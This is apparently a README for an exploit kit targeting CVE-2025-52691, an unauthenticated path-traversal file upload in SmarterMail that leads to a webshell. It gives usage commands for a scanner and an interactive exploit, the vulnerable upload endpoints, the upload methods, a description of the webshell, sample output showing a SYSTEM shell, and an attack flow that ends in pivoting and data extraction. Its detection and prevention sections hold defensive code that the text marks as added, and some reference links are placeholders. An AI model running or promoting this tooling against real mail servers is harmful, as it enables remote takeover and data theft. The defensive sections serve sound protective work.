## https://sploitus.com/exploit?id=E95F365A-7EC9-5ADF-9D6E-2FBB40BB8039
# CVE-2025-52691 POC

Proof of Concept exploit for CVE-2025-52691 - SmarterMail Unauthenticated Arbitrary File Upload leading to Remote Code Execution.

## ⚠️ Disclaimer

This repository is for **authorized security testing and educational purposes only**. Unauthorized access to computer systems is illegal. The authors are not responsible for any misuse of this software.

## 📋 Overview

CVE-2025-52691 is a critical vulnerability in SmarterMail that allows unauthenticated attackers to upload arbitrary files to the web server through path traversal, leading to Remote Code Execution (RCE).

### Vulnerability Details

- **CVE ID**: CVE-2025-52691
- **Affected Software**: SmarterMail
- **Vulnerability Type**: Arbitrary File Upload / Path Traversal
- **Attack Vector**: Network (Unauthenticated)
- **Impact**: Remote Code Execution (RCE)
- **CVSS Score**: Critical

The vulnerability exists in multiple upload endpoints that fail to properly validate file paths, allowing attackers to use path traversal sequences (`../`) to upload ASPX webshells to the web root directory.

## 🛠️ Tools Included

### 1. check.py - Vulnerability Scanner
Scans SmarterMail instances to detect if they are vulnerable to CVE-2025-52691.

**Features:**
- Checks multiple upload endpoints
- Non-invasive detection
- Batch scanning from file
- Detailed vulnerability reporting

**Usage:**
```bash
# Check single target
python check.py https://mail.example.com

# Check multiple targets from file
python check.py -f targets.txt

# Save results to file
python check.py -f targets.txt -o results.txt

# Custom timeout
python check.py https://mail.example.com -t 30
```

### 2. pwn.py - Interactive Exploit Tool
Full-featured exploit tool with interactive shell capability.

**Features:**
- Multiple upload methods (Multipart, Raw POST, JSON)
- Automatic shell verification
- Interactive command execution
- Single command execution mode
- Color-coded output

**Usage:**
```bash
# Basic exploitation
python pwn.py https://mail.example.com

# Execute single command
python pwn.py https://mail.example.com -c "whoami"

# Interactive shell mode
python pwn.py https://mail.example.com -i

# Custom timeout
python pwn.py https://mail.example.com -t 30
```

### 3. exploit.py - Library/Module
Core exploitation library that can be imported and used in other scripts.

**Features:**
- Clean class-based architecture
- Multiple upload strategies
- Shell verification
- Command execution
- Easy integration into custom tools

**Usage:**
```python
from exploit import SmarterMailExploit, TargetConfig, ExploitResult

# Configure target
config = TargetConfig(base_url="https://mail.example.com")

# Initialize exploit
exploit = SmarterMailExploit(config)

# Run exploitation
result = exploit.exploit()

if result == ExploitResult.SHELL_UPLOADED:
    output = exploit.execute_command("whoami")
    print(output)
```

## 📦 Installation

### Prerequisites
- Python 3.7+
- pip

### Setup
```bash
# Clone the repository
git clone https://github.com/yourusername/CVE-2025-52691-POC.git
cd CVE-2025-52691-POC

# Install dependencies
pip install -r requirements.txt
```

### Dependencies
```
requests>=2.28.0
urllib3>=1.26.0
```

## 🎯 Attack Flow

1. **Target Identification**: Identify SmarterMail instances
2. **Vulnerability Check**: Use `check.py` to verify vulnerability
3. **Exploitation**: Use `pwn.py` to upload ASPX webshell
4. **Shell Access**: Execute commands via uploaded webshell
5. **Post-Exploitation**: Pivot, escalate privileges, or extract data

## 🔍 Technical Details

### Vulnerable Endpoints
- `/api/upload`
- `/api/v1/upload`
- `/Interface/Frmx/UploadFile.aspx`
- `/MRS/Upload.ashx`
- `/Services/Upload.ashx`

### Exploitation Methods
1. **Multipart Form Upload**: Standard file upload with path traversal
2. **Raw POST with Headers**: Direct binary upload with custom headers
3. **JSON Payload**: Base64-encoded file content in JSON

### Webshell Deployment
The exploit uploads a minimal ASPX webshell that:
- Accepts commands via GET parameter `cmd`
- Executes commands using `cmd.exe`
- Returns output wrapped in `` tags

## 🛡️ Detection & Prevention

### Detection
- Monitor for unusual file uploads to web directories
- Check for ASPX files in unexpected locations
- Review web server logs for suspicious `/api/upload` requests
- Look for path traversal patterns (`../`) in upload requests
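The log checks above can be automated. The following is an added example, not part of this repository: it flags POSTs to the upload endpoints listed on this page, traversal sequences in the request line, and `.aspx` requests carrying a `cmd` parameter, then correlates them per client IP. The log field order, the `dir` query parameter and the sample lines are constructed assumptions.

```python
from urllib.parse import parse_qs, unquote

# Upload endpoints listed on this page, lower-cased for comparison.
UPLOAD_ENDPOINTS = {
    "/api/upload", "/api/v1/upload", "/interface/frmx/uploadfile.aspx",
    "/mrs/upload.ashx", "/services/upload.ashx",
}

# Constructed sample lines (not real traffic). Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = """\
2025-01-10 09:14:02 198.51.100.7 GET /index.html - 200
2025-01-10 09:15:40 203.0.113.9 POST /api/upload - 200
2025-01-10 09:15:41 203.0.113.9 POST /Services/Upload.ashx dir=%2e%2e%5c%2e%2e%5c 200
2025-01-10 09:15:44 203.0.113.9 GET /s4a7b3c2.aspx cmd=whoami 200
2025-01-10 09:20:00 198.51.100.7 GET /Interface/Frmx/UploadFile.aspx - 200
"""

def has_traversal(text):
    """True if text holds ../ or ..\\ after undoing up to two layers of URL encoding."""
    for _ in range(2):
        text = unquote(text)
    return "../" in text.replace("\\", "/")

def scan(log_text):
    """Return (findings, suspects): per-line reasons, and client IPs that
    POSTed to an upload endpoint and later requested an .aspx with cmd=."""
    findings, uploaders, suspects = [], set(), set()
    for line_no, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if line.startswith("#") or len(parts) != 7:
            continue  # skip W3C header lines and malformed rows
        _date, _time, ip, method, stem, query, _status = parts
        reasons = []
        if method == "POST" and stem.lower() in UPLOAD_ENDPOINTS:
            reasons.append("upload-endpoint")
            uploaders.add(ip)
        if has_traversal(stem) or has_traversal(query):
            reasons.append("path-traversal")
        if stem.lower().endswith(".aspx") and "cmd" in parse_qs(query, keep_blank_values=True):
            reasons.append("aspx-cmd-param")
            if ip in uploaders:
                suspects.add(ip)
        if reasons:
            findings.append((line_no, ip, reasons))
    return findings, suspects

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG)[0]:
        print(finding)
```

Traversal carried in a multipart body or JSON payload does not appear in standard access logs, so a match here is a starting point for review rather than full coverage.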

### Prevention
- **Update SmarterMail** to the latest patched version
- Implement strict input validation on file upload endpoints
- Use a Web Application Firewall (WAF)
- Restrict file execution permissions in upload directories
- Implement proper authentication on all upload endpoints
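As an illustration of the "strict input validation" item, this added example (not SmarterMail's code and not part of this repository) contrasts a naive path join with a hardened destination check. The allowlist, directory names and function names are assumptions chosen for the example.

```python
import posixpath
from pathlib import Path

ALLOWED_EXT = {".pdf", ".png", ".jpg", ".txt"}  # assumed allowlist; no server-executable types

class RejectedUpload(ValueError):
    """Raised when a client-supplied file name must not be written to disk."""

def naive_destination(upload_dir, client_name):
    # Flawed pattern: the client-supplied name is joined as-is, so "../" walks out of upload_dir.
    return posixpath.normpath(posixpath.join(upload_dir, client_name))

def safe_destination(upload_dir, client_name):
    # 1. A file name is one path component: no separators, drive/stream colon or NUL byte.
    if (not client_name or client_name in {".", ".."}
            or any(c in client_name for c in "/\\:\x00")):
        raise RejectedUpload("file name contains a path component")
    # 2. Allowlist the extension so types the web server executes (.aspx, .ashx) are never stored.
    if Path(client_name).suffix.lower() not in ALLOWED_EXT:
        raise RejectedUpload("extension not on allowlist")
    # 3. Defence in depth: resolve the final path (following symlinks) and
    #    confirm it sits directly inside the upload directory.
    base = Path(upload_dir).resolve()
    dest = (base / client_name).resolve()
    if dest.parent != base:
        raise RejectedUpload("resolved path escapes upload directory")
    return dest

def audit(upload_dir, names):
    """Map each candidate file name to 'ok' or the rejection reason."""
    results = {}
    for name in names:
        try:
            safe_destination(upload_dir, name)
            results[name] = "ok"
        except RejectedUpload as exc:
            results[name] = str(exc)
    return results

if __name__ == "__main__":
    samples = ["report.pdf", "../wwwroot/page.aspx", "..\\page.aspx", "page.aspx"]
    print("naive:", naive_destination("/srv/app/uploads", samples[1]))
    for name, verdict in audit("/srv/app/uploads", samples).items():
        print(f"{name!r}: {verdict}")
```

Rejecting a suspicious name outright, instead of silently stripping it to a base name, also leaves a clear event to log and alert on.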

## 📝 Example Output

```
╔═════════════════════════════════════════════════════════╗
║        CVE-2025-52691 Exploit Tool                      ║
║        SmarterMail Arbitrary File Upload RCE            ║
╚═════════════════════════════════════════════════════════╝

[*] Target: https://mail.example.com
[*] Checking if target is reachable...
[+] Target is alive
[*] Shell filename: s4a7b3c2.aspx
[*] Attempting to upload webshell...
[*] Trying endpoint: /api/upload
[~] Upload attempt successful (Multipart)
[*] Verifying shell access...
[+] SUCCESS! Webshell uploaded
[+] Shell URL: https://mail.example.com/s4a7b3c2.aspx

shell> whoami
nt authority\system
```

## 🔗 References

- [CVE Details](#)
- [SmarterMail Official Site](https://www.smartertools.com/smartermail)
- [MITRE CVE-2025-52691](#)

## 📄 License

This project is released for educational and authorized security testing purposes only.

## 👥 Authors

Security Research Team

## 🤝 Contributing

Contributions are welcome! Please ensure all contributions are for legitimate security research purposes.

1. Fork the repository
2. Create your feature branch (`git checkout -b feature/improvement`)
3. Commit your changes (`git commit -am 'Add some improvement'`)
4. Push to the branch (`git push origin feature/improvement`)
5. Open a Pull Request

## ⭐ Acknowledgments

Thanks to the security research community for responsible disclosure practices.

---

**Remember**: Always obtain proper authorization before testing any systems you don't own.